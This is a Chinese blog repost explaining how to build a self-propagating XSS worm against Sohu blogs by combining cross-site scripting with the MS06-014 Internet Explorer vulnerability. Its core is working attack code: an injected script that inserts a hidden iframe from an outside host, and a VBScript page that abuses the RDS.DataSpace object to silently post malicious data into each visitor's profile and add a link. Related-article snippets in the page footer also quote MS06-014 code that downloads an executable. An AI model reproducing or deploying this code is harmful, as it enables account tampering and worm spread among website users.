跨站结合MS06-014实现XSS worm

最新推荐文章于 2024-07-14 15:54:59 发布
最新推荐文章于 2024-07-14 15:54:59 发布
阅读量156 收藏
点赞数
文章标签: javascript ViewUI
原文链接:http://www.cnblogs.com/ljpbin/archive/2008/01/21/1047348.html
版权
1.XSS代码长度限制,不能超过2000字符。
分析:写成JAVACRIPT后需转HTML编码十进制,一小段便超过2000字符了。

2.“域权限”限制。
分析:XSS worm的POST数据相关代码不能从站外调用,通俗点讲就是不能站外提交数据,包括调用外部JS用document.write方法,所以只能把POST数据的代码全部写到XSS里。


从正常的脚本代码上估计是没什么方法了,只有靠浏览器的漏洞,突破以上两点的思路:

1.直接用XSS代码写一个框架网页.

Quote:
javascript:for(i=0;i<document.images.length;i++){if(document.images.src.indexOf('j')==0)document.images.width=0};document.body.insertAdjacentHTML("afterBegin"," <iframe src=http://xxxxxx.com/ xss-worm.htm width=0 height=0></iframe")



2.利用MS06-014漏洞创建本地权限POST数据. xss-worm.htm 代码如下:

Quote:
<html>
<script language="VBScript">
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
x.Open "post"," http://blog.sohu.com/manage/profile.do",False
x.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
x.send " 恶意XSS数据"
x.Open "post"," http://blog.sohu.com//manage/link.do",False
x.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
x.send "m=add&title=Hacker%20s0n9&desc=XSS%20worm&link=http%3A//s0n9.blog.sohu.com"
</script>
</html>



分析:xss-worm.htm也就是框架网页,提交 恶意XSS数据到浏览者的资料里,至于 恶意XSS数据也就是第一步写框架网页修改个人资料所抓的包的内容,同时浏览者也会自动加一个友情连接。

总结:当浏览者进去XSS worm页面,就会自动修改自己的个人档案加入恶意XSS内容,同时其他浏览者也会传染,唯一的限制就是浏览器必须没有打MS06-014的补丁。

转载于:https://www.cnblogs.com/ljpbin/archive/2008/01/21/1047348.html

weixin_30640291
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS07-014漏洞分析.doc
09-24
此漏洞对于Office 2000、2002、2003等系统均有效。用WinHex打开文件可以看到,ShellCode位于文件偏移的0x1900处。将该ShellCode部分的0x90909090用0xcccccccc填充后,使得文档在执行Int 3指令处停下来。
ms06-040漏洞分析1
08-08
3. 漏洞利用漏洞的利用分为本地和远程两种,本地利用用于分析此导出函数存在的漏洞,在远程靠此漏洞进行恶意代码执行,进而控制存在此漏洞的主机 4. 漏洞影响此例中
一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站
Purpleendurer@CSDN
02-13 3617
一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站endurer 原创2008-02-13 第1版一位网友反映说他所管理的网站出了问题,打开任一网页,杀毒软件就报病毒。检查该网站的网代码,发现:/---<iframe src=hxxp://xxx.hu*i**la**ib*a*.info/104.htm width=100 height=0></ifra
MS06-014原始代码
lobenton的路边摊
05-19 977
on error resume next dl = "[url]http://www.baidu.com/heng.exe[/url]" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Micros
深入浅出MS06-040
12-07
如果您根据本文的指导亲手完成了全部的7节实验内容,相信您对栈溢出的掌握和漏洞利用的认识一定会到一个更高的level。
实训指导5.1.5操作系统漏洞攻击MS06-040(精)PPT文档.pptx
11-14
操作系统漏洞攻击是网络安全领域中的一个重要话题,特别是在这个实训指导中,重点讨论了针对MS06-040漏洞的溢出攻击。MS06-040,也被称为“网络堆栈溢出漏洞”,是微软Windows操作系统中一个知名的漏洞,它主要影响...
MS06-040溢出套装
10-31
MS06-040溢出套装】是针对2006年微软发布的一个重要安全更新的漏洞利用工具集合。这个套装主要关注的是Windows操作系统中的一个严重安全问题,该问题被称为“网络堆栈缓冲区溢出”或“MS06-040漏洞”。这个漏洞...
信息安全技术基础:Windows系统缓冲区溢出漏洞利用(MS06-040).doc
11-01
信息安全技术基础
JavaScript 报错】未捕获的URI错误:Uncaught URIError
Allen-
07-11 665
Uncaught URIError 是JavaScript中常见的一种错误,通常发生在全局URI处理函数(如 decodeURIComponent、encodeURIComponent)使用不当时。本文将详细介绍 Uncaught URIError 错误的常见原因及其解决方案。
vue2 实现原生 WebSocket
weixin_38797742的博客
07-11 294
原生WebSocket: new WebSocket。
ReactRouter v6升级的步骤
最新发布
feixin369的博客
07-14 187
React Router v6 引入了一个 Routes组件,它有点像Switch,但功能要强大得多。与Switch相比,RoutesReact.lazy。
一个使用Go语言和现代Web技术构建跨平台桌面应用程序开源项目
yunmoon的博客
07-10 1051
Wails作为一个桥梁,连接强大的Go后端逻辑与丰富的Web前端界面,允许开发者利用两者的最佳特性来开发应用。
商品详情使用富文本编辑器
m0_74356429的博客
07-13 119
2、因为好多页面都需要用到,封装富文本编辑器组件。3、在商品编辑和商品添加页面添加富文本编辑器。Editor.vue代码。
javascript的高级用法(循环实现数组map方法)
阿乐的博客
07-13 226
值得一提的是,map的第二个参数就是第一个参数回调中的这个点。如果第一个参数是箭头函数,则设置第二个 this 将无效,因为箭头函数的词法绑定。另一个是稀疏数组的处理,HasOwnProperty 用于判断当前下标的元素是否存在于数组中,欢迎大家在评论区交流。使用方法:将selfMap注入到Array.prototype中(下面数组的迭代方法也是如此)
Webkit简介以及工作流程
读心悦
07-10 324
WebKit是一个开源的浏览器引擎,最初由苹果公司基于KHTML(K Desktop Environment的HTML渲染引擎)开发,并广泛应用于Safari浏览器。随着时间的推移,WebKit也被其他多款浏览器和应用所采用,成为Web技术生态中的重要一员。WebKit的核心功能包括解析HTML、CSS、JavaScript等网页内容,并将其渲染为可视化的网页页面。它主要由WebCore(负责HTML解析、CSS样式计算和布局)和JavaScriptCore(负责JavaScript解释执行)两大部分组成。
在项目中,如何使用springboot+vue+springsecurity+redis缓存+Axios+MySQL数据库+mybatis
huanghm88的专栏
07-11 683
在Spring Boot中,可以使用Spring Data JPA和MyBatis来配置MySQL数据库。在Vue项目中,可以创建一个config.js文件来配置后端的API地址,然后在需要发送请求的地方使用Axios发送请求。根据业务需求,在Spring Boot中编写相应的接口和服务层代码,包括数据访问、业务逻辑等。在Vue中,可以使用Axios发送HTTP请求,并将响应的数据展示在前端页面上。分别启动后端的Spring Boot应用和前端的Vue应用,访问前端页面,就可以看到与后端进行通信的效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值